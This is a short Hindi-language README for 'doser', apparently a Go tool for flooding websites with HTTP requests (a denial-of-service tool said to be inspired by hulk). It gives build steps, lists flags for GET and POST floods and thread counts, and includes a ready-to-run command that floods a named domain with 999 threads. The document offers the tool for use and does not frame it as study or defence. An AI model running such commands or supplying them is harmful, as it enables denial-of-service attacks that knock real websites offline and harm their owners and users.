
HTTP अनुरोधों के लिए DoS उपकरण (hulk से प्रेरित लेकिन इसमें अधिक कार्यक्षमताएँ हैं)
HTTP अनुरोधों के लिए DoS उपकरण (hulk से प्रेरित लेकिन अधिक कार्यक्षमताओं के साथ) जो Go में लिखा गया है:

go build doser.go
./doser -t 999 -g 'https://stylish-bear.ru'
Usage of ./doser: [-h] [-g G] [-p P] [-d D] [-ah AH] [-t T]
optional arguments:
-h, --help show this help message and exit
-g Specify GET request. Usage: -g '< url >'
-p Specify POST request. Usage: -p '< url >'
-d Specify data payload for POST request
-t Specify number of threads to be used